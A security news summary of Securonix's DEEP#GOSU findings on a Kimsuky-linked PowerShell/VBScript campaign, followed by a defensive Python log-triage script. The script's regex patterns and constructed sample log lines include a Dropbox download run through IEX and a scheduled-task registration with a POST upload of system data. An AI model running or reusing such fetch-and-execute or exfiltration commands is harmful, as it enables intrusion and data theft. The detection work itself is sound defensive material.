
Sophisticated DEEP#GOSU Attack Campaign Uncovered by Securonix

Cybersecurity firm Securonix has discovered a complex, multi-stage attack campaign dubbed DEEP#GOSU, likely linked to the North Korean state-sponsored group Kimsuky. The campaign uses PowerShell and VBScript to infect systems and steal sensitive information.

The malware utilized in this attack is designed to operate covertly on systems, with features such as keylogging, clipboard monitoring, dynamic payload execution, and data exfiltration. It also uses remote access tools and scheduled tasks for persistence.

One significant aspect of this attack is its use of legitimate services such as Dropbox and Google Docs for command and control. This allows the attackers to blend in with regular network traffic, update the malware's functionality, and deliver additional modules.

The attack begins with a malicious email attachment containing a ZIP archive with a phony file. This file contains a PowerShell script and a decoy document. The PowerShell script then communicates with a Dropbox infrastructure controlled by the attackers to obtain and execute another PowerShell script.

This second-stage script downloads a .NET assembly file from Dropbox, which is, in reality, a remote access trojan known as TruRat. This trojan can record keystrokes, manage files, and facilitate remote control. Kimsuky has previously used TruRat in other campaigns.

The PowerShell script also downloads a VBScript from Dropbox, designed to run arbitrary code retrieved from the cloud storage service. This includes another PowerShell script that uses Windows Management Instrumentation (WMI) to execute commands and set up scheduled tasks for persistence.

The VBScript also uses Google Docs to dynamically retrieve configuration data for the Dropbox connection, enabling the attackers to modify the account information without changing the script itself. The PowerShell script retrieves system information and sends it to Dropbox via a POST request.

Overall, this attack campaign is highly advanced and employs a combination of PowerShell and VBScript to infect systems and obtain information from them. Using legitimate services for command-and-control and dynamic configuration retrieval makes identifying and protecting against it challenging.
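As an added illustration (not from Securonix's report or the original post), the Python below shows one way a defender could triage PowerShell script-block log entries for the combination of behaviours described above: cloud storage used for payload delivery and exfiltration, Google Docs used for configuration lookup, and WMI or scheduled tasks used for persistence. The indicator patterns, the threshold and the sample log lines are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass, field

# Indicator families drawn from the behaviours described above. Each pattern is an
# assumption for this example, not a signature published with the report.
INDICATORS = {
    "dropbox_api": re.compile(r"dropboxapi\.com|dl\.dropboxusercontent\.com", re.I),
    "google_docs": re.compile(r"docs\.google\.com", re.I),
    "scheduled_task": re.compile(
        r"Register-ScheduledTask|schtasks(\.exe)?\s+/create|PS_ScheduledTask|Win32_ScheduledJob", re.I),
    "wmi_exec": re.compile(r"Invoke-WmiMethod|Invoke-CimMethod|Get-WmiObject|Win32_Process", re.I),
    "http_post": re.compile(r"-Method\s+Post|\.UploadString\(|\.UploadData\(", re.I),
    "dynamic_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}

@dataclass
class Finding:
    record_id: int
    matched: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.matched)

def scan_script_block(record_id: int, script_text: str) -> Finding:
    """Return the indicator families a single script-block log entry matches."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(script_text)]
    return Finding(record_id, hits)

def triage(records: dict, threshold: int = 2) -> list:
    """Flag records matching at least `threshold` distinct indicator families.
    A cloud-service URL on its own is normal in many environments, so one hit is
    not enough; cloud access combined with persistence or dynamic execution is."""
    findings = [scan_script_block(i, text) for i, text in records.items()]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)

# Constructed sample script-block entries (Event ID 4104 style); not real captures.
SAMPLE_LOGS = {
    1: r"Get-ChildItem C:\Temp -Recurse | Remove-Item -Force",
    2: r"Invoke-WebRequest https://docs.google.com/document/d/EXAMPLE/export?format=txt -OutFile notes.txt",
    3: r"$cfg = (Invoke-WebRequest 'https://docs.google.com/document/d/EXAMPLE/export').Content; "
       r"$r = Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/download -Headers $h; IEX $r",
    4: r"Invoke-CimMethod -ClassName PS_ScheduledTask -Namespace root/Microsoft/Windows/TaskScheduler "
       r"-MethodName RegisterByXml -Arguments @{Xml=$x}; "
       r"Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -Body $sysinfo",
}

if __name__ == "__main__":
    for f in triage(SAMPLE_LOGS):
        print(f"record {f.record_id}: score {f.score}, indicators {f.matched}")
```

Records 1 and 2 fall below the threshold (no hits and a lone Google Docs fetch respectively), while records 3 and 4 are flagged because they combine cloud access with dynamic execution or with WMI-driven scheduled-task persistence and a POST upload.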


Deitasoft © 2024. All Rights Reserved.